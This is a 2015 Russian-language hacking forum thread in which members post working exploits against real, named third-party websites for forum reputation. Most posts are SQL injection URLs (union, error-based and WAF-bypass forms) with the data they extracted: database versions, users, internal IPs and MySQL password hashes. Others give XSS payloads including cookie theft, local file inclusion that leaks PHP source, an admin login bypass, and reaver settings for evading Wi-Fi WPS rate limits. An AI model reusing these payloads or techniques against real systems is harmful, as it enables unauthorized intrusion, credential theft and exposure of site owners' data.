Просмотр полной версии : Уязвимости SQLi, XSS и другие.
Егорыч+++
10.05.2015, 10:12
Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
Google:
site:antichat.ru ваш_сайт_с_уязвимостью.ру
Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.
↑ (https://antichat.live/posts/3865352/)
Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.
BabaDook
10.05.2015, 11:30
Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
BabaDook
10.05.2015, 11:37
Три lfi
http://greyslon.ru/index.php
post
action=register
&ajax=true
&data=login%3De%26email%3De%26pass%3De%26repass%3De %26payeer%3De%26captcha%3De
&page=../info
Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
BabaDook
10.05.2015, 12:49
bidderland.co.in/siteadmi (https://vk.com/away.php?to=http%3A%2F%2Fbidderland.co.in%2Fsitead min%2Flogin.php)n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
WallHack
10.05.2015, 20:16
↑ (https://antichat.live/posts/3845281/)
Первая SQL
http://www.c2-int.com/news-full.php?id=1278' (http://www.c2-int.com/news-full.php?id=1278%27)
А что не раскрутил ?
http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14+--+
Версия: 5.5.43-37.2
User: c2deuts_ice@localhost
-----------------------------
Вторая XSS
Зачем делать несколько постов можно в одном все выложить
↑ (https://antichat.live/posts/3845293/)
Просто прямо сейчас ищу )) Как нахожу выкладываю!
Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,v ersion%28%29,6,7,8,9,10,11,12+--+
5.5.40-0ubuntu0.12.04.1 - вывод в заголовке
http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11 ,12,13,14,15,16+--+
5.6.23
http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3, 4,5,6+from+users+limit+10,1+--+
4.1.18-nt
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select +1,user%28%29,database%28%29,version%28%29,5+--+
idserver_damico@winwebs03.cpt.wa.co.za (mailto:idserver_damico@winwebs03.cpt.wa.co.za)
idserver_damicodb
5.5.42-cll
Mister_Bert0ni
11.05.2015, 00:51
http://goo.gl/imjzsb (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2Fimjzsb&post=-92282941_46)
http://goo.gl/8IKVeV (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2F8IKVeV&post=-85727471_3239)
http://goo.gl/wYRBLz
http://emofans.ru/gallery/emowallp/
POST_DATA:
foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- - (http://vk.com/away.php?to=http%3A%2F%2Fgoo.gl%2FwYRBLz&post=-85727471_3239)
https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)
Mister_Bert0ni
11.05.2015, 00:55
Демонстрация SQLi от меня
Mister_Bert0ni
11.05.2015, 00:56
Демонстрация SQLi от меня
Mister_Bert0ni
11.05.2015, 01:00
SQLi на сайте bitbank
Mister_Bert0ni
11.05.2015, 01:01
↑ (https://antichat.live/posts/3845075/)
bidderland.co.in/siteadmi (https://vk.com/away.php?to=http%3A%2F%2Fbidderland.co.in%2Fsitead min%2Flogin.php)
n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
Да да 5 сек даже много)))
rezistor
11.05.2015, 08:49
Внесу и я свои первые 5 копеек
http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 -- (http://www.leong-leong.com/press.php?id=-68%20union%20select%201,user%28%29,database%28%29, version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29%20--)
Arboretum
11.05.2015, 09:15
http://java.lordy.ru/
Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.
http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database% 28%29,0x3a,version%28%29%29+--+
jhewlett_r@209.68.5.201
jhewlett_prod:5.0.96-log
http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a ,version%28%29,user%28%29,database%28%29,floor%28r and%280%29*2%29%29%20having%20min%280%29%20or%201--+
5.0.96-log
nightgallery20@72.167.232.44
nightgallery20
http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x 2f,version%28%29,user%28%29,database%28%29,floor%2 8rand%280%29*2%29%29%20having%20min%280%29%20or%20 1--+
10.0.17-MariaDB-cll-lve
austral3_casso@server-2h-r34.ipv (mailto:austral3_casso@server-2h-r34.ipv)4.au.syr
http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,ve rsion%28%29,database%28%29,user%28%29%29,4,5+--+
4.0.26-standard-log
novagoraTest
novagoraTest@10.0.5.18
↑ (https://antichat.live/posts/3845700/)
http://www.girlplays.ru/view_search.php
уязвимость в поисковике, пока что не крутил.
пост данные
search=&submit_s=
search=') union select 1,concat(User,Password),3,4,5,6,7 from mysql.user#&submit_s=
root*B7C246CBBD3D468E80CB40AD57BA8BAFFEEB62BC
(http://www.girlplays.ru/view_game.php?id=1)debian-sys-maint*E639A7C638862F6392314324D1E7537900655649
adelina*21A61A920952BE6489C905AA3836F552D4A1C631 (http://www.girlplays.ru/view_game.php?id=1)
http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version% 28%29,null,null%20--
Версия: 5.6.23
User: oarorgro_oar@localhost
rezistor
11.05.2015, 19:54
XSS
http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgI BD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0 YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri 9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0L g8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYC HwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292Lm NhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5p dD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi 8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlk ZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2 FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5 ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLm FzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucn Uvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucn UvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8B Z2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAh EPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5h c3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHw IFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9k FgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW 5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVv LmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw 8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYC AgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLm FzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBR NsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDx YCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdz LmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7AL xvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античатalert()&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText= (http://gov.cap.ru/?__VIEWSTATE=%2fwEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgI DD2QWEgIBD2QWAgIBD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQs NGI0YHQutCw0Y8g0YDQtdGB0L%2fRg9Cx0LvQuNC60LAgPGRpd j7QntGE0LjRhtC40LDQu9GM0L3Ri9C5INC%2f0L7RgNGC0LDQu yDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0Lg8L2Rpdj5kAgM PZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwFoZBYCZg8PF gIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292LmNhcC5ydS9Pcmd hbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5pdD1jb250YWN0Z GQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi8vZ292LmNhcC5 ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlkZAIJDw8WAh8BZ 2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2FwLnJ1L1NpdGV NYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5ZAILDw8WAh8CB ShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLmFzcHg%2fZ292X 2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucnUvc3B lYy9EZWZhdWx0LmFzcHg%2fZ292X2lkPTQ5ZGQCDw8PFgIfAgU maHR0cDovL2dvdi5jYXAucnUvcnNzLz9nb3ZfaWQ9NDkmaWQ9N DlkZAIHD2QWBgIDDw8WAh8BZ2RkAgUPDxYCHwFnZGQCFQ8PFgI fAWdkZAINDw8WAh8BZ2RkAhEPDxYCHwFoZGQCEw9kFhoCAQ9kF gICAQ8PFgIfAgUcaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPXR vcGRkAgMPZBYCAgEPDxYCHwIFHWluZm8uYXNweD9nb3ZfaWQ9N DkmdHlwZT1tYWluZGQCBQ9kFgICAQ8PFgIfAgUdaW5mby5hc3B 4P2dvdl9pZD00OSZ0eXBlPW5ld3NkZAIHDw8WAh8BaGRkAgkPZ BYCAgEPDxYCHwIFFHZpZGVvLmFzcHg%2fZ292X2lkPTQ5ZGQCC w8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw8WAh8CBRdjYWxlbmR hci5hc3B4P2dvdl9pZD00OWRkAg8PZBYCAgEPDxYCHwIFGlB1Y mxpY2F0aW9uLmFzcHg%2fZ292X2lkPTQ5ZGQCEQ9kFgICAQ8PF gIfAgUYTWVtb3JpYWxzLmFzcHg%2fZ292X2lkPTQ5ZGQCEw8PF gIfAWhkZAIVD2QWAgIBDw8WAh8CBRNsYXdzLmFzcHg%2fZ292X 2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDxYCHwF oZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdzLmFzc Hg%2fZ292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf 6N7ALxvhcyia%2b88BzPuA4FLR9eN77dXGFDCRBD%2f&ctl00%24Search1%24BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00%24Search1%24TextSearch=античатalert()&__EVENTVALIDATION=%2fwEWBwK1y%2fX1DALNk6LCAwKbnsfF CAK8lLmCCQLC9M%2bdCwKC1JS2BwKjz9%2fDAXkyh%2bc6G8rM sfjzrV2Wjy6zi7nnNfiqJHMfqPO%2bS6mI&ctl00%24Comments=античат&ctl00%24ErrorText=)
Mister_Bert0ni
12.05.2015, 00:54
http://goo.gl/uMgvlO
http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c7 93a4963656c616e643b636f6c6f723a7265643b73697a653a3 53b746578742d736861646f773a23303030203070782030707 820337078223e4d69737465725f42657274306e693c62723e, 0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723 e43757272656e745f55736572203a3a202020203a3a ,@b,0x3c62723e56657273696f6e206f662044617461626173 65203a3a2020,VERSION(),0xa3c62723e486f73746e616d65 203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
Может кто знает как здесь WAF на information_schema обойти?
Mister_Bert0ni
12.05.2015, 14:29
↑ (https://antichat.live/posts/3846203/)
Да и в ближайщее время тут всякие конкурсы, на которых будет возможность проявить себя.
Для этого будет создан отдельный раздел?Где они будут постится?
BabaDook
12.05.2015, 14:33
↑ (https://antichat.live/posts/3846206/)
Для этого будет создан отдельный раздел?Где они будут постится?
Да, тут есть конкурс на безопасность ОС, итд Это + к репе
Я стану первым кто сделает это
И так мой исследование и авторство
Надеюсь маленькие глупенькие не увидят
И так расскажу как можно обойти
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi
Всё очень просто
-T, --m57-timeout=
-d, --delay=
-t, --timeout=
команда примет такой вид
reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20
советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.
п.с советую начать не с 20, а с 50 или 100
читайте мануалы к программам, вот что я вам скажу
Mister_Bert0ni
12.05.2015, 15:16
↑ (https://antichat.live/posts/3846208/)
Да, тут есть конкурс на безопасность ОС, итд Это + к репе
Я стану первым кто сделает это
И так мой исследование и авторство
Надеюсь маленькие глупенькие не увидят
И так расскажу как можно обойти
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking при взломе wi-fi
Всё очень просто
-T, --m57-timeout=
-d, --delay=
-t, --timeout=
команда примет такой вид
reaver -i mon0 -b 00;11;11;11;11;11 -c 12 -vv -m57-timeout=20 --delay=20 --timeout=20
советую в комплексе использовать очень важная команда --delay. Остальные для успокоение души.
п.с советую начать не с 20, а с 50 или 100
читайте мануалы к программам, вот что я вам скажу
Не на всех роутерах delay помогает))) TP-Link-и часто в лок уходят после 10 неправильных попыток ввода пина с одного мак-адреса и delay там все равно)
http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%2 8version%28%29,0x4c7,user%28%29%29,null,null,null, null,null,null--
Версия:4.1.21-standard
User:ctrekker@localhost
Егорыч+++
12.05.2015, 20:39
↑ (https://antichat.live/posts/3846394/)
http://www.towcar.info/read.php?id=-1%20union%20all%20select%20null,null,null,concat%2 8version%28%29,0x4c7,user%28%29%29,null,null,null, null,null,null--
Версия:4.1.21-standard
User:ctrekker@localhost
Это какой то сверх дырявый сайт и причем очень давно.
↑ (https://antichat.live/posts/3846399/)
Это какой то сверх дырявый сайт и причем очень давно.
А этот пойдет?
http://www.sourceisrael.com/read.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%28vers ion%28%29,0x4c7,user%28%29%29,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL--
BabaDook
13.05.2015, 02:53
http://m.deffki.su/?go=
по моему lfi но я не могу раскрутить, если кто подскажет буду признателен
↑ (https://antichat.live/posts/3846603/)
http://m.deffki.su/?go=
по моему lfi но я не могу раскрутить, если кто подскажет буду признателен
Набранное количество баллов позволяет Вам задавать вопросы по уязвимостям в профильном разделе форума.
По поводу вопроса - небольшая подсказка:
http://m.deffki.su/?go=php://filter/convert.base64-encode/resource=index
dir=$root_path.'/templates/';
$tpl->load_template('main.tpl');
$go=$_GET[go];
if ($go=="prv")
{
header("Location:$site_url/prv.php?id=$_GET[id]");
}
elseif (!empty($go))
{
include"$go.php
";
$indek_1=$indek;
}
else
{
include"main.php";
}
if (empty($descr))
{
$descr="Ýðîòèêà - ýòî òàëàíò êðàñèâî ñ ñåê ñóàëüíî ïîêàçàòü æåíñêîå òåëî. Ñ äðóãîé ñòîðîíû, ëþ áûå ÷àñòíûå ýðî ôîòî òàê æå ìîæíî íàçâàòü ýðîòèêîé . Îáû÷íûå ãîëûå äåâóøêè í äîìàøíèõ ôîòîãðàôèÿõ ýò ïðîñòî ýðîòèêà, à êðàñèâ î ïîêàçàííûå ãîëûå äåâî÷ê è ýòî óæå êðàñèâàÿ, ïðîôå ñèîíàëüíàÿ ýðîòèêà. Íà íà øåì ñàéòå âû åæåäíåâíî ìî æåòå íàáëþäàòü è òî è äðó ãîå (áåñïëàòíî) - ëþáèòåëüñêèå ôîòî ãîëûõ áàá è ïðîôåññèîíàëüíûå ôî òîãðàôèè ãîëûõ òåëîê ìîäå ëåé. Çàõîäèòå ÊÀÆÄÛÉ ÄÅÍÜ è íàñëàæäàéòåñü ñåêñóàëü ûìè ôîòî ãîëûõ æåíùèí îí àéí!";
}
else
{
$descr="$descr";
}
$tpl->set('{main}',$main);
$tpl->set('{title}',$title);
$tpl->set('{indek}',$indek);
$tpl->set('{indek_1}',$indek_1);
$tpl->set('{descr}',$descr);
$tpl->compile('main');
echo$tpl->result['main'];
?>
http://www.coon-coon.com/ViewPhoto.php?Id=9%27%20and%20%28select%201%20from %28select%20count%28*%29,concat%280x56657273696F6E 3A3A,version%28%29,0x557365723A3A0D0A,user%28%29,f loor%28rand%280%29*2%29%29x%20from%20information_s chema.character_sets%20group%20by%20x%29a%29--%27
Version::5.5.40-0ubuntu0.12.04.1
User:: c31cooncooncom@localhost
Егорыч+++
13.05.2015, 21:17
↑ (https://antichat.live/posts/3846921/)
очень простая sql
http://www.radiotec.ru/catalog.php?cat=jr1&art=-11329+union+select 1.2,3,user(),database(),6,vers ion(),8,9,10,11,12,13,14,15,16,17,18,19+--+ -
/threads/21336/page-663#post-2395458 (https://antichat.live/threads/21336/page-663/)
/threads/21336/page-607#post-2158662 (https://antichat.live/threads/21336/page-607/)
http://www.sporte-leisure.com.au/info.php?id=-1%27%20union%20all%20select%20null,concat%280x7469 6765725F783C62723E3C62723E,0x56657273696F6E3A3A20, version%28%29,0x3C62723E557365723A3A20,user%28%29% 29,null,null,null,null--%27
Version:: 5.1.48-community
User:: root@localhost
перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
Google: site:antichat.ru вашсайтсуязвимостью.ру
Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.
↑ (https://antichat.live/posts/3847285/)
1) SQL-inj
http://amphora.ru/books.php?pageit= (https://vk.com/away.php?to=http%3A%2F%2Famphora.ru%2Fbooks.php%3F pageit%3D10)
VULNERABLE
http://amphora.ru/books.php?pageit=10+procedure+analyse+(extractvalu e(1,concat(0x3a,version())),1)--
XPATH syntax error: ':5.5.35-1+wheezy1+mh1-log'
http://www.pidsphil.org/journal.php?id=40%20UNION%20ALL%20SELECT%20NULL,NU LL,CONCAT%280x74696765725F783C62723E3C62723E,0x566 57273696F6E3A3A20,version%28%29,0x3C62723E55736572 3A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL ,NULL--
Version:: 5.5.32-log
User:: pidsphil_user1@10.20.112.231
BabaDook
14.05.2015, 21:52
Не очень я люблю xss
http://tab.dp.ua/catalog.php?sword=%3c%73%63%72%69%70%74%3e%61%6c%6 5%72%74%28%31%32%33%29%3b%3c%2f%73%63%72%69%70%74% 3e
Ну так же ради юмора
http://tab.dp.ua/catalog.php?sword=%3c%68%31%3e%48%45%4c%4c%4f%3c%2 f%68%31%3e
нашёл случайно в попытках вставить php код.
Там ещё sql есть
Mister_Bert0ni
15.05.2015, 00:19
3) SQL-inj
http://www.imevents.ru/events.php?id= (http://www.imevents.ru/events.php?id=999999.9%20union%20all%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,999,26,27,28,29--)
VULNERABLE
[HTML]
...
...
,,subscribers,is_active,,temp_keys,session_id,,tem p_keys,code,,temp_keys,date,,users,id,,users,user_ pass,,users,email,,users,name,,users,company,,user s,activity,,users,position,,users,phone,,users,reg time,,users,last_visit_time,,users,last_ip,,users, code,,users,is_blocked,,users,is_active,,users,sub scribe,,users_sessions,session_id,,users_sessions, unid,,users_sessions,created_time,,year,id">
http://www.muziekhuis.nl/details.php?id=-1%20union%20all%20select%20NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%280x3C 62723E54494745525F583C62723E,0x56657273696F6E3A3A2 0,version%28%29,0x3C62723E557365723A3A20,user%28%2 9%29,NULL,NULL,NULL,NULL,NULL
Version:: 5.5.43-0+deb7u1
User:: muzhuis_qbusa@194.109.22.94
Mister_Bert0ni
16.05.2015, 01:46
http://s7.hostingkartinok.com/uploads/images/2015/05/8be2623fe570f979db6aa734529f4ab7.png
Шниперсон
16.05.2015, 12:36
Мои 5 копеек
http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10
Mister_Bert0ni
16.05.2015, 14:11
↑ (https://antichat.live/posts/3847967/)
1. В сообщении нет ссылки. Не видно уязвимых параметров и вектора атаки. Если перейти по редиректу, ссылка будет видна в адресной строке, но разные браузеры могут отображать некоторые символы по-своему.
2. Cсылка на эту тему передается в реферере. Возможные проблемы для форума.
3. IP-адреса тех, кто перешел по ссылке, сохраняются в логах сервера. Возможные проблемы для юзеров.
4. Рядом со своим ником советую указывать адрес, телефон и паспортные данные. Это же круто.
Понял.Спасибо за наставление.
BabaDook
16.05.2015, 23:34
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1
http://www.eroticland.kh.ua/index.php?nav_id=1
↑ (https://antichat.live/posts/3848263/)
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1
http://www.eroticland.kh.ua/index.php?nav_id=1
http://www.eroticland.kh.ua/index.php?nav_id=-1%27+and+456=78+union+select+1,2,3,version%28%29,5 ,6+--+
5.1.73 вывод в title
BabaDook
17.05.2015, 01:57
http://sex.pics-land.ru/admin/
логин admin' or 1=1#
http://www.futurefarmers.com/playshop/PJ1.php?id=-3%20union%20select%201,2,3,version(),5,6,7,8,9,10, 11,12,13,14
ТИЦ20 PR5
5.1.72-rel14.10
↑ (https://antichat.live/posts/3848263/)
Вот нашёл немного, но раскрутить не могу. если кто подскажет как такие раскручивать, тогда, того поцелует сама Моника
http://amurchik.com.ua/catalog/dlya-nee/?block=1&filters=&sortBy=1
http://www.eroticland.kh.ua/index.php?nav_id=1
Ковырял тот что ты первый в списке вылазил, все хотел хотя бы ксс какой-нить попробовать засунуть, в итоге ничего толкового не вышло Получилось только вот такое, веселья для или как смотреть запрещенные сайты в обход корпоротивной прокси
http://amurchik.com.ua/search/?q=%3Ciframe+src%3D%22http%3A%2F%2Fmicrosoft.com%2 2%3E%3C%2Fiframe%3E
XSS: http://yarmakmusic.com/admin/index.php/">alert(document.cookie)
http://www.canaaninthedesert.com/ca...ame),3,4,5,6+from+information_schema.tables-- (http://www.canaaninthedesert.com/catalog_show.php?x=-1+union+select+1,group_concat(table_name),3,4,5,6+ from+information_schema.tables--)
LFI: http://www.sex-park.ch/?load=preise../../index
// faza02: http://www.sex-park.ch/?load=php://filter/convert.base64-encode/resource=index
BabaDook
18.05.2015, 23:54
http://english.fortline.ru/page.php?id=87'+and+false+union+select 1,version(),3,3,4+--+ -
http://www.mmpris.ru/products.php?rid=2&id=99+And+1=2+union+select 1,database(),user()#
BabaDook
19.05.2015, 00:41
http://itccst.ru/news_view.php?id=19'+and+false+/*!12345%55%6e%69%4f%4e*/+/*!12345%73%65%6c%65%63%74*/2,user(),3,database(),5+'1#
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((
http://www.keramir-iv.ru/discr.php?id=3'+and+false+union+select 1,database (),3,4,4,4,4,4,5,5,6,7,8,7,7,6,5,4,4,7/**/'1#
этот error-base?
//можно крутить и как error и как union
http://diagnostika-plus.ru/index.php?page=dcatalog99'+%75%4e%49%4f%6e+%53%45% 4c%65%63%74 1,2,database(),4,5/**/'1#
http://www.spectehsnab.ru/index1.php?id=2+and+false+union+select+concat((sel ect (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where
(table_schema!=0x696e666f726d6174696f6e5f736368656 d61) and (@a)in(@a:=concat(@a,0x3c6c693e,table _schema,
0x203a3a20,table_name,0x203a3a20,column_name,0x3c6 2723e))))a))#
http://www.limo-pro.ru/services.php?id=34+union+select 1,version(),{f d atabase()},4,5,user(),7,8#
Спасибо парню, за статью))
Господа, я потом обединю в один пост , не ругайтесь
Mister_Bert0ni
19.05.2015, 13:47
http://bluegrassmidwest.com/details.php?id=.18%00' ++UNION+ALL+SELECT+1,concat(0x3c666f6e742073697a65 3d22352220636f6c6f723d2272656422203e7e7e496e6a6563 746564204279204d69737465725f42657274306e697e7e3c68 723e,0x4461746142617365203a3a,database(),0x3c62723 e56457273696f4e203a3a,version(),
0x3c62723e557365723a3a,user(),0x3c68723e3c2f666f6e 743e,make_set(6,@:=0x0a,(select(1)from(information _schema.columns)where@:=make_set(511,@,0x3c6c693e, table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -
↑ (https://antichat.live/posts/3849163/)
http://www.matrot.ru/index.php?langue=2&page=M41H'+and+false+union+select 1,2,3,4,5/**/'1
что-то я догнать не могу, где вывод ((
http://www.matrot.ru/index.php?action=search&Departement=0&langue=4&page=%27and%28select%201%20from%28select%20count%2 8*%29%2cconcat%28%28select%20concat%28version%28%2 9,user%28%29%29%20from%20information_schema.tables %20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x %20from%20information_schema.tables%20group%20by%2 0x%29a%29and%27
это error-base
↑ (https://antichat.live/posts/3849168/)
лично этой теме дублей нет
К примеру:
https://www.google.com/search?q=site:antichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:spectehsnab.ru (https://www.google.com/search?q=site%3Aantichat.ru&ie=utf-8&oe=utf-8#q=site:forum.antichat.ru+intext:spectehsnab.ru)
